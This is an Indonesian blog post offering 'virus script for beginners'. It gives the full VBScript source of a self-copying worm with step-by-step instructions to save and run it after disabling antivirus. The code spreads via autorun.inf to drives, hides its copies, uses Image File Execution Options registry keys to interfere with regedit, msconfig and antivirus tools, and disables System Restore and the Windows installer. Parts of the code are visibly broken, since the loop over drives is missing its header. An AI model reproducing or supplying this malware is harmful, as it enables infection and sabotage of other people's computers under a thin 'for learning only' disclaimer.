Sabtu, 16 Oktober 2010

Script Virus Buat Pemula

kali ini saya akan membagikan script virus buat sobat² semua untuk pemula dengan tujuan pembelajaran bukan untuk merugikan orang lain.. segala resiko yang dihasilkan oleh virus ini,diluar tanggung jawab saya.
pertama copy paste code dibawah ke dalam notepad (kodenya dari "on error resume" hingga
"script fullname").



On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do

Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39


If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then

Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39

Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next

'Manipulasi registry
Set vhck3d = createobject("wscript.shell")


Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname


setelah anda copy paste kode diatas, anda simpan di notepad dan rename menjadi hacked.vbs

note: 
  1. untuk menguji virus ini matikan dulu semua antivirus di komputer/laptop anda lalu double click file hacked.vbs tadi.
  2. sekali lagi saya tegaskan segala resiko ditanggung oleh anda sendiri.
  3.  untuk script virus yang lainnya tinggal kunjungi http://govirsterid.blogspot.com dan http://markasvirus.wordpress.com atau klik aja disini dan disini

*sumber: http://govirsterid.blogspot.com
               http://markasvirus.wordpress.com

    Jangan Lupa komentarnya 😉






    0 comments:

    Posting Komentar

    Silahkan tinggalkan komentar anda disini